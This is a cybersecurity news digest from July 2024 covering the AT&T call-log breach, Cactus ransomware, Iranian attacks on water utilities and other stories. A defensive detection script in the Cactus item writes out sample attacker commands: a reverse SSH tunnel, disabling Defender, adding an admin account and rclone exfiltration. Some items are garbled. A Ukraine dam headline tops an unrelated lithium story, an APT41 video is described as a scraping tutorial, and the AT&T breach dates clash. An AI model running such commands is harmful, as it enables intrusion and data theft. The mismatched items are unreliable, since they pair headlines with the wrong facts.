Daily Drop (816): NHS | AT&T | Huawei & ZTE | U.S. Aging DAMs | ADF: AU SPY | HMAS Anzac | JN: HPE | Intel | UA: RU DAM Claims | AI: Strawberry | Cactus | DPRK Drones | CN AI: G42 | IR: Water
07-15-24
Sunday, Jul 15 2024 // (IG): BB // ShadowNews // Coffee for Bob
*Started adding Proofs of Concept (PoC), if available, for mentioned CVEs:
A Proof of Concept (PoC) is a small exercise to test a certain hypothesis or demonstrate that a potential project can be viable. It's primarily used to verify that certain concepts or theories have the potential for real-world application. The purpose of a PoC is to showcase the feasibility, functionality, and potential of a concept before proceeding to the development of the full-scale project.*
Hackers Stole ‘Nearly All’ Call Logs Over Six Months from AT&T
Bottom Line Up Front (BLUF): Hackers breached AT&T's data storage on Snowflake, stealing metadata from nearly all call logs and texts of AT&T customers over six months in 2022. The breach impacted approximately 109 million accounts, exposing telephone numbers and interaction details.
Analyst Comments: This incident underscores the vulnerabilities in third-party cloud storage platforms and the critical need for robust security measures. It highlights the potential risks to national security and public safety posed by such breaches, given the scale of data exposed. The delay in public reporting, facilitated by DOJ exemptions, emphasizes the delicate balance between transparency and operational security during ongoing investigations.
FROM THE MEDIA: AT&T revealed that hackers accessed its data storage on Snowflake between April 14 and April 25, 2023, stealing aggregated metadata from calls and texts made by its customers. The data did not include content but comprised telephone numbers, interaction counts, and call durations. The breach affected both AT&T wireless customers and those using mobile virtual network operators (MVNO) on AT&T’s network. AT&T notified the FBI and received DOJ exemptions to delay public reporting, citing national security concerns. This breach follows previous security incidents involving AT&T, reflecting ongoing challenges in securing customer data against sophisticated cyber threats.
READ THE STORY: The Record // Wired // THN
OpenAI Working on New Reasoning Technology Under Code Name ‘Strawberry’
Bottom Line Up Front (BLUF): OpenAI is developing a new AI project called "Strawberry" to enhance its models' reasoning capabilities, aiming to enable them to perform autonomous and complex tasks, including deep research and long-term planning.
Analyst Comments: The Strawberry project represents a significant leap in AI development, focusing on improving reasoning skills that are crucial for achieving human-like intelligence. This initiative aligns with industry trends where major AI players are striving to overcome the current limitations of large language models, particularly in logical reasoning and problem-solving.
FROM THE MEDIA: OpenAI is secretly working on a project named "Strawberry," designed to boost the reasoning capabilities of its AI models. The initiative aims to allow AI to autonomously navigate the internet and perform in-depth research, a challenging feat for current AI technologies. Internal documents reviewed by Reuters reveal that Strawberry employs a specialized post-training process to refine AI models. This technology is expected to enable AI to handle long-horizon tasks, requiring advanced planning and execution over extended periods. While specifics remain under wraps, OpenAI's goal is to significantly enhance AI reasoning, a critical component for achieving higher levels of intelligence and practical applications in various fields.
READ THE STORY: Reuters
White House Urged to Double Check Microsoft Isn't Funneling AI to China via G42 Deal
Bottom Line Up Front (BLUF): House committee chairs Michael McCaul and John Moolenaar have requested the White House investigate Microsoft's $1.5 billion deal with UAE-based G42 over concerns it could inadvertently transfer advanced AI technology to China.
Analyst Comments: This scrutiny reflects ongoing geopolitical tensions and the complex interplay between technology, national security, and international relations. The concerns underscore the need for stringent safeguards when U.S. companies engage in significant tech investments abroad, particularly in regions with close ties to China. The situation highlights the importance of robust measures to prevent the unintentional transfer of sensitive technologies to adversarial nations.
FROM THE MEDIA: House committee leaders Michael McCaul and John Moolenaar have sent a letter to the White House urging an investigation into a deal between Microsoft and G42, a UAE-based AI research firm. The $1.5 billion investment by Microsoft aims to foster AI development in the Middle East. However, concerns have arisen due to G42's previous ties to China, prompting fears that American AI technology could be funneled to Beijing. Although both Microsoft and G42 have assured that appropriate security measures will be in place, such as restricted access to AI technologies, the House committee chairs remain skeptical and seek a detailed review to ensure U.S. national security interests are protected.
READ THE STORY: The Register
America’s Aging Dams Are a Catastrophe Waiting to Happen
Bottom Line Up Front (BLUF): Climate change is exacerbating the vulnerability of nearly 92,000 aging dams in the United States. Many of these dams, over a century old, are increasingly at risk from extreme weather events, highlighting an urgent need for infrastructure investment and renovation.
Analyst Comments: The partial failure of the Rapidan Dam in Minnesota serves as a stark reminder of the critical state of America's infrastructure. As climate change intensifies, the frequency and severity of extreme weather events are rising, pushing the limits of these aging dams. With many no longer serving their original purposes, the decision to repair, replace, or remove these structures is crucial. This situation calls for significant federal and state intervention, both in terms of funding and policy, to ensure public safety and environmental health.
FROM THE MEDIA: The recent partial failure of the Rapidan Dam in Minnesota, amidst historic flooding, brought attention to the broader issue of America's aging dams. Built in the early 1900s, many of these structures are now over 100 years old and increasingly vulnerable to extreme weather. An analysis by Inside Climate News of federal data revealed nearly 4,100 dams nationwide are in poor or unsatisfactory condition, with hundreds posing significant risks to human life and property. The Infrastructure Investment and Jobs Act allocated $3 billion for dam-related projects, yet the challenge remains daunting as communities grapple with the high costs and complexities of necessary repairs or removals. Efforts in states like Minnesota and Michigan showcase both the potential solutions and the formidable obstacles in addressing this widespread infrastructure crisis.
READ THE STORY: Wired // Inside Climate News
Advanced Laser Anti-Aircraft System Set to Enhance South Korea's Defense Capabilities Against North Korea's Drone Provocations
Bottom Line Up Front (BLUF): South Korea has initiated a project to deploy laser-powered anti-aircraft weapons, known as the "Star Wars project," to counter North Korean drones. This innovative system, developed by Hanwha Aerospace Co., will be operational this year and represents a significant advancement in military technology.
Analyst Comments: The deployment of laser-based anti-aircraft systems marks a strategic upgrade in South Korea's defense infrastructure, particularly in response to the evolving drone threats from North Korea. This technology not only offers a cost-effective solution, with each shot costing approximately $1.45 in energy, but also represents a shift towards futuristic defense mechanisms that could potentially counter more sophisticated threats like aircraft and missiles in the future.
FROM THE MEDIA: South Korea's Defense Acquisition Program Administration (DAPA) announced the "Star Wars project," aiming to neutralize drones using laser technology. The lasers, which are silent and invisible, require only electricity to operate and have shown a 100% success rate in tests. Developed by Hanwha Aerospace Co., the system is set to be mass-produced and delivered to the military this year. The project has received ₩87.1 billion ($63.2 million) in investment since 2019 and could eventually be upgraded to counter aircraft and ballistic missiles. This initiative is part of South Korea's broader strategy to bolster its defenses against North Korean provocations, which include the use of drones for surveillance and even balloons loaded with garbage to disrupt the South.
READ THE STORY: The Register
Russian-born Australian Army Private and Her Husband Charged with Espionage
Bottom Line Up Front (BLUF): Kira and Igor Korolev, a Russian-born couple residing in Brisbane, have been charged with espionage for allegedly stealing sensitive Australian Defense Force (ADF) material to provide to Russian intelligence. They face up to 15 years in prison if convicted.
Analyst Comments: This case highlights potential vulnerabilities in the vetting and security clearance processes within the Australian Defense Force. The use of new espionage laws reflects Australia's commitment to counter foreign interference, particularly from countries like Russia. This incident underscores the importance of stringent background checks and continuous monitoring of personnel with access to sensitive information, especially those with foreign ties.
FROM THE MEDIA: Kira Korolev, a 40-year-old IT private in the Australian Army, and her 62-year-old husband, Igor, have been arrested on charges of espionage. The Australian Federal Police (AFP) alleges that Kira instructed Igor to access her ADF work account and send classified information to her while she was in Russia. This case is the first to use new espionage laws introduced in 2018, which aim to counteract foreign interference and protect national security. The investigation is ongoing, with authorities examining whether the couple had long-term intentions to spy for Russia or were recent recruits. Both have been remanded in custody until their next court appearance in September.
Russian Student Sentenced to 5 Years for Collecting Sensitive Military Data for Ukraine’s Security Services
Bottom Line Up Front (BLUF): A Russian student was sentenced to five years in a maximum security colony for collecting and passing information about Russian troop locations to Ukraine's security service, the SBU. This case highlights ongoing espionage activities amid the Russia-Ukraine conflict.
Analyst Comments: The sentencing of the Russian student for espionage activities reflects the heightened state of intelligence warfare between Russia and Ukraine. This incident underscores the persistent risks and the strategic importance of cyber and human intelligence in modern conflicts. The swift judicial process and the student's admission of guilt indicate the Russian authorities' strong stance on internal security breaches.
FROM THE MEDIA: Russia’s Federal Security Service (FSB) reported that the student, residing in the Siberian city of Birobidzhan, was caught collecting and transmitting sensitive military data to Ukraine’s security service (SBU). Despite his full cooperation and admission of guilt, he received a five-year sentence. This case is one among many recent espionage activities, with both Russia and Ukraine actively detaining individuals for similar offenses. Earlier, Ukraine’s cyber police arrested a man posing as a food delivery courier for collecting data on military and critical infrastructure sites. Such incidents illustrate the cyber and intelligence battles that continue alongside the conflict.
READ THE STORY: The Record // RIA
Germany to Bar Chinese Companies' Components from Core Parts of Its 5G Networks
Bottom Line Up Front (BLUF): Germany will ban the use of critical components from Chinese companies Huawei and ZTE in its 5G networks, starting with core parts by 2026 and expanding to include critical management systems in access and transport networks by 2029. This decision aims to mitigate cybersecurity risks and reduce dependency on Chinese technology.
Analyst Comments: Germany’s phased ban on Huawei and ZTE components from its 5G infrastructure underscores escalating concerns over cybersecurity and espionage. Aligning with similar actions by other Western nations, this move reflects a strategic shift towards securing telecommunications infrastructure against potential threats. It also highlights Germany’s broader strategy to reduce economic dependencies on China, despite ongoing economic ties and collaboration on global issues such as climate change.
FROM THE MEDIA: Germany, Europe's largest economy, announced that critical components from Chinese firms Huawei and ZTE will be excluded from its 5G core networks by the end of 2026, and from critical management systems in 5G access and transport networks by 2029. Interior Minister Nancy Faeser emphasized that this decision aims to protect Germany's communication infrastructure from security risks. Despite Huawei’s denial of any cybersecurity threats posed by its technology, the German government remains focused on reducing vulnerabilities and dependencies. This decision follows similar measures by countries like the US, UK, and Australia, reflecting growing Western apprehensions about Chinese technology in critical infrastructure.
READ THE STORY: CNN // AP // The Washington Post
HMAS Anzac Decommissioned for New Fleet of General-Purpose Frigates
Bottom Line Up Front (BLUF): HMAS Anzac is being decommissioned to make way for Australia's new fleet of general-purpose frigates. South Korea is positioning itself to secure the contract, with ongoing discussions about enhanced defense cooperation and joint exercises.
Analyst Comments: The decommissioning of HMAS Anzac and the introduction of new general-purpose frigates signify Australia's commitment to modernizing its naval capabilities. South Korea's active pursuit of the frigate contract, coupled with its recent success in securing an Australian Army vehicle contract, underscores its strategic push to deepen defense ties with Australia. This potential collaboration within the AUKUS framework and beyond highlights the evolving security dynamics in the Indo-Pacific region, particularly in response to increasing geopolitical tensions.
FROM THE MEDIA: Almost a year after securing a multi-billion-dollar contract to build Australian Army vehicles, South Korea is actively promoting closer defense ties with Australia. South Korean Vice-Defence Minister Kim Seon-ho is in Canberra to discuss future cooperation on AUKUS Pillar 2 projects and to advocate for South Korea's bid to supply the Royal Australian Navy with new general-purpose frigates. The discussions also include increasing joint military and cyber exercises. This week, South Korea supported an Australian-led accusation against Beijing for large-scale cyber espionage. The final bids for the frigate project, which involves competitors from Japan, Spain, Germany, and South Korea, are nearing completion.
READ THE STORY: MSN
Labour Launches Cyber Security Crackdown on Russia and China After NHS Hack
Bottom Line Up Front (BLUF): In response to a recent cyberattack on the NHS, the UK government plans to introduce stricter regulations to prevent cyber threats from Russia and China. The new measures will focus on securing third-party contractors involved in essential public services.
Analyst Comments: The UK's decision to tighten cybersecurity regulations following the NHS hack highlights the increasing threat of cyberattacks on critical infrastructure. This move reflects a broader trend among Western nations to bolster cyber defenses against perceived threats from state actors like Russia and China. Strengthening rules for third-party contractors is a crucial step in addressing vulnerabilities in supply chains and ensuring comprehensive protection of public services.
FROM THE MEDIA: The UK government is expected to announce new cybersecurity measures to combat threats from Russia and China, following a severe ransomware attack on the NHS last month. The attack, attributed to the Russian cybercriminal group Qilin, disrupted services at two London hospital trusts, leading to the postponement of over 800 operations and 700 outpatient appointments, including critical cancer treatments. The new regulations will require all providers of essential infrastructure, including third-party contractors, to implement robust cybersecurity measures. This initiative aims to enhance the resilience of the UK's public services against digital attacks and learn from past incidents to improve future responses.
READ THE STORY: The Telegraph
Game Developer Accuses Intel of Selling 'Defective' Raptor Lake CPUs
Bottom Line Up Front (BLUF): Alderon Games, an indie game developer, has publicly criticized Intel's 13th and 14th-generation Core microprocessors, claiming they are defective. The studio reports significant stability issues with these CPUs, leading to frequent crashes and memory corruption. In response, Alderon Games is transitioning all their servers to AMD processors.
Analyst Comments: Intel's ongoing issues with its Raptor Lake CPUs highlight the challenges tech companies face in balancing performance and stability. Alderon Games' switch to AMD underscores a growing frustration within the industry regarding Intel's inability to resolve these problems promptly. This situation could impact Intel's reputation and market share, particularly if more developers and consumers follow suit. Intel must address these concerns transparently to restore confidence in its products.
FROM THE MEDIA: Alderon Games, known for the multiplayer game "Path of Titans," has encountered severe stability problems with Intel's 13th and 14th-generation Core CPUs, leading to crashes and memory corruption. Despite Intel's efforts to mitigate these issues through microcode, BIOS, and firmware updates, the problems persist. Alderon Games reports nearly a 100% failure rate over time with these processors and has decided to switch all its servers to AMD chips, citing significantly fewer crashes. The studio is advising players and server hosts to avoid Intel's Raptor Lake processors, even implementing in-game notifications to warn users. Intel has acknowledged the instability issues and continues to investigate, urging affected customers to contact support.
READ THE STORY: AG // The Register
Ukraine Dismisses Russian Allegations of Planned Dam Attacks
Bottom Line Up Front (BLUF): International Battery Metals (IBAT) has successfully commercialized a novel direct lithium extraction (DLE) technology, marking a significant milestone for the lithium industry. This new approach promises to revolutionize lithium production by being faster, more efficient, and environmentally friendly.
Analyst Comments: The commercialization of IBAT's DLE technology is poised to transform the global lithium supply chain, crucial for the burgeoning electric vehicle (EV) market. This breakthrough addresses long-standing issues in traditional lithium extraction methods, such as high water use and long production times. By utilizing portable, modular plants, IBAT offers a scalable and relocatable solution that can be rapidly deployed to various brine sources globally. The technology’s ability to recycle over 98% of the water used further underscores its environmental benefits. This innovation not only enhances the efficiency of lithium extraction but also positions IBAT as a key player in the sustainable energy sector.
FROM THE MEDIA: International Battery Metals (IBAT) has become the first company to commercially produce lithium using a novel filtration-based DLE technology. At a site in Utah, IBAT is producing nearly 5,000 metric tons of lithium per year. This portable plant design allows for scalable and relocatable production, with each plant capable of being moved and reused at new deposits, significantly reducing construction costs. This method also recycles over 98% of water used, addressing one of the major environmental concerns in lithium production.
READ THE STORY: Reuters
HPE to Build Japan's Fastest AI Supercomputer
Bottom Line Up Front (BLUF): Hewlett Packard Enterprise (HPE) will construct a cutting-edge supercomputer for Japan's National Institute of Advanced Industrial Science and Technology (AIST), leveraging Nvidia's H200 GPUs. This project, supported by Japan's Ministry of Economy, Trade and Industry, aims to advance AI research and fortify Japan's AI sovereignty.
Analyst Comments: The development of ABCI 3.0 signifies Japan's commitment to maintaining a competitive edge in AI research. This move aligns with global trends where nations invest heavily in AI infrastructure to ensure technological self-reliance and foster innovation. The involvement of Nvidia and the use of advanced Cray XD systems highlight the importance of integrating high-performance computing resources to support large-scale AI models and applications.
FROM THE MEDIA: HPE is set to build a new supercomputer for Japan's AIST, utilizing Nvidia's latest H200 GPUs to support generative AI research. The ABCI 3.0 will be offered as a cloud service to the public and private sectors, aiming to boost innovation and research. The system, featuring Cray XD technology and Intel's 5th Gen Xeon Scalable processors, is projected to be Japan's fastest AI supercomputer with a theoretical maximum performance of 6.2 exaflops. This initiative, part of a broader $1 billion investment by Japan's METI, underscores the strategic importance of AI sovereignty and infrastructure development as articulated by Nvidia's CEO, Jensen Huang.
READ THE STORY: The Register
Cactus Ransomware: New Strain in the Market
Bottom Line Up Front (BLUF): Cactus ransomware, active since March 2023, targets organizations via VPN vulnerabilities, implementing double extortion by encrypting files and threatening data leaks. Its advanced encryption techniques and strategic use of open-source tools and scripts make it a formidable threat to cybersecurity.
Analyst Comments: Cactus ransomware's emergence and persistent threat underscore the evolving sophistication of cybercriminal tactics. By exploiting specific VPN vulnerabilities and employing advanced encryption methods, Cactus exemplifies the need for continuous vigilance and robust cybersecurity measures. Organizations must prioritize patch management, employee training, and comprehensive security protocols to mitigate such risks.
FROM THE MEDIA: Cactus ransomware, which surfaced in March 2023, has been identified as a significant threat, targeting over 100 entities up until April 2024. It exploits VPN vulnerabilities, particularly in Fortinet VPN products, to gain initial access. Once inside, attackers use SSH backdoors, network scanning tools like SoftPerfect and PSNmap, and remote management software for persistence. The ransomware employs RSA and AES encryption, leveraging OpenSSL libraries, and uses scheduled tasks for persistence. It also disables antivirus software and creates new admin accounts to facilitate data exfiltration and system compromise. The exfiltration process involves RClone for cloud storage, followed by a PowerShell script to execute the ransomware payload across the network. The encryption process is meticulous, targeting specific file types and employing sophisticated encryption keys.
READ THE STORY: Tech Nadu // Trellix
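The behaviours listed above (network scanning, SSH tunnels, antivirus disabled, new admin accounts, scheduled tasks, RClone uploads, PowerShell payload spread) are each individually noisy but together form a recognisable sequence. The following Python script is an added example, not code from this digest, from Trellix or from Tech Nadu: it runs simple rules over a handful of constructed process-creation log lines and escalates a host once several distinct behaviours appear on it. The log format (`host=... user=... cmd="..."`), the host names, and every regex are assumptions about how such activity would look in a typical endpoint log, not indicators taken from the article.

```python
import re
from collections import defaultdict

# Detection rules, one per behaviour the article attributes to Cactus intrusions.
# Each regex is an assumption about how that behaviour appears in a process-creation
# log line; they are illustrative, not indicators from the page.
RULES = [
    ("network_scanning",    re.compile(r"\b(netscan|psnmap)(\.exe)?\b", re.I)),
    ("ssh_backdoor",        re.compile(r"\bsshd(\.exe)?\b|\bssh(\.exe)?\s.*\s-R\s", re.I)),
    ("av_disabled",         re.compile(r"Set-MpPreference\s.*-DisableRealtimeMonitoring", re.I)),
    ("admin_account_added", re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("scheduled_task",      re.compile(r"\bschtasks(\.exe)?\s+/create\b", re.I)),
    ("rclone_exfil",        re.compile(r"\brclone(\.exe)?\b\s+(copy|sync|move)\b", re.I)),
    ("ps_payload_spread",   re.compile(r"\bpowershell(\.exe)?\s.*(-enc(odedcommand)?\s|Invoke-Command)", re.I)),
]

HOST_RE = re.compile(r"\bhost=(\S+)")

# Constructed sample log lines (assumed format: "<utc time> host=<name> user=<user> cmd=<command line>").
# SRV01 shows the full chain, WS17 a single hit, WS22 only benign look-alikes.
SAMPLE_LOGS = [
    r'2024-04-02T03:10:07Z host=SRV01 user=CORP\svc_backup cmd="netscan.exe /range:10.0.0.1-10.0.0.254"',
    r'2024-04-02T03:12:41Z host=SRV01 user=CORP\svc_backup cmd="ssh.exe -N -R 2222:localhost:3389 tunnel@203.0.113.5"',
    r'2024-04-02T03:15:02Z host=SRV01 user=CORP\svc_backup cmd="powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"',
    r'2024-04-02T03:16:30Z host=SRV01 user=CORP\svc_backup cmd="net localgroup administrators backupsvc /add"',
    r'2024-04-02T03:18:11Z host=SRV01 user=backupsvc cmd="schtasks /create /tn SystemUpdate /tr C:\ProgramData\upd.bat /sc minute /mo 5"',
    r'2024-04-02T03:40:55Z host=SRV01 user=backupsvc cmd="rclone.exe copy D:\Finance remote:bucket --transfers 8"',
    r'2024-04-02T04:02:19Z host=WS17 user=CORP\jdoe cmd="powershell.exe -nop -w hidden -enc <base64-redacted>"',
    r'2024-04-02T09:00:00Z host=WS22 user=CORP\admin cmd="rclone.exe version"',
    r'2024-04-02T09:01:00Z host=WS22 user=CORP\admin cmd="schtasks /query /tn Backup"',
]


def classify(line):
    """Return the behaviour categories a single log line matches (possibly none)."""
    return [cat for cat, rx in RULES if rx.search(line)]


def triage(lines, min_categories=3):
    """Group rule hits per host and flag hosts showing several distinct behaviours.

    Returns {host: {"categories": [...], "hits": [(category, line), ...], "escalate": bool}}
    for every host with at least one hit; hosts with no hits are omitted.
    """
    per_host = defaultdict(lambda: {"categories": set(), "hits": []})
    for line in lines:
        cats = classify(line)
        if not cats:
            continue
        m = HOST_RE.search(line)
        host = m.group(1) if m else "unknown"
        per_host[host]["categories"].update(cats)
        per_host[host]["hits"].extend((c, line) for c in cats)
    return {
        host: {
            "categories": sorted(d["categories"]),
            "hits": d["hits"],
            "escalate": len(d["categories"]) >= min_categories,
        }
        for host, d in per_host.items()
    }


if __name__ == "__main__":
    for host, report in triage(SAMPLE_LOGS).items():
        flag = "ESCALATE" if report["escalate"] else "watch"
        print(f"{host}: {flag} ({len(report['categories'])} behaviours) {report['categories']}")
```

The per-host threshold is the point of the exercise: a lone scheduled-task creation or a single `rclone` invocation is routine on many networks, so alerting on each rule alone produces noise, while three or more of these behaviours on one host within a short window is worth an analyst's attention. In practice the rules would be expressed in the SIEM's own query language and the threshold tuned to the environment.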
US Scrambles to Stop Iranian Hackers Known as the ‘Cyber Avengers’ From Hitting Water Utilities
Bottom Line Up Front (BLUF): The U.S. government is urgently working to protect water utilities from cyberattacks by the "Cyber Avengers," a group linked to Iran’s Islamic Revolutionary Guard Corps (IRGC). These hackers target Israeli-made industrial devices used in water utilities, exploiting vulnerabilities to breach systems.
Analyst Comments: This incident highlights the critical need for robust cybersecurity measures in protecting vital infrastructure. The attacks by the IRGC-linked group underline the persistent threat posed by state-sponsored cyber actors. Immediate actions, such as removing vulnerable devices from the internet and updating security protocols, are essential to safeguard against potential disruptions to water supplies.
FROM THE MEDIA: The U.S. government is scrambling to determine the number of water utilities at risk from the "Cyber Avengers," a hacker group linked to Iran's IRGC. These hackers have breached multiple water utilities by exploiting vulnerabilities in Israeli-made industrial devices. Despite some utilities voluntarily reporting intrusions, the exact number of affected facilities remains unclear due to non-mandatory reporting requirements. Federal agencies, including CISA and the FBI, are advising utilities to enhance security measures, such as changing default passwords, disconnecting vulnerable devices from the internet, and enabling multi-factor authentication. Although no disruptions to water supply have been reported, the potential for severe consequences necessitates prompt and comprehensive defensive actions.
READ THE STORY: MSN
Items of interest
Bridging the Gap Between Job Seekers and Employers in India's Competitive Market
Bottom Line Up Front (BLUF): This study by Ashutosh Kumar, Kinshuk Chauhan, and Jaspreet Kaur Grewal from Chandigarh University investigates the potential of web scraping technology to enhance job portals in India. By automating data extraction from various job websites, the research aims to streamline the job search process, making it more efficient and user-friendly. The study focuses on methodologies, tools, and technologies employed in web scraping to provide insights into the most in-demand skills and job opportunities in the Indian IT industry.
Analyst Comments: Web scraping offers a promising solution to the fragmented job search process in India, where millions of graduates enter the job market annually. Traditional job search methods often fall short in matching candidates with suitable positions due to outdated information and limited reach. By leveraging web scraping tools like BeautifulSoup and Scrapy, job portals can continuously update job listings and provide personalized recommendations to job seekers. This not only enhances the user experience but also ensures that employers receive applications from candidates whose skills closely align with job requirements. The integration of such technology is poised to revolutionize e-recruitment in India's dynamic job market.
FROM THE MEDIA: India produces millions of graduates annually, leading to intense competition in the job market. Job seekers often struggle to find positions that match their skills and interests due to a lack of detailed information about job openings and company operations. This study explores the use of web scraping to extract data from job portals, aiming to provide job seekers with up-to-date information on job opportunities and required skills. The research highlights the importance of tools like BeautifulSoup, Selenium, and Scrapy in automating data collection and parsing, enabling the creation of a more efficient job search platform. Enhanced user features such as real-time updates, personalized job recommendations, and improved user interfaces are also discussed. The findings suggest that web scraping can significantly improve the job search experience by providing timely and relevant job listings, thereby helping bridge the gap between employers and job seekers.
READ THE STORY: SCRS
Puppeteer: Headless Automated Testing, Scraping, and Downloading (Video)
FROM THE MEDIA: This tutorial walks you through everything you need to know about Puppeteer and headless browsers, so you can automate website testing, web scraping, fetching and downloading content, and more.
Nullcon Berlin 2024 | How Things Are Going For APT41 In 2024 (Video)
FROM THE MEDIA: This video tutorial demonstrates how to efficiently scrape product review data from websites using Selenium, combined with techniques for handling JSON APIs, emphasizing the importance of choosing the right tools and methods for web scraping tasks.
The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.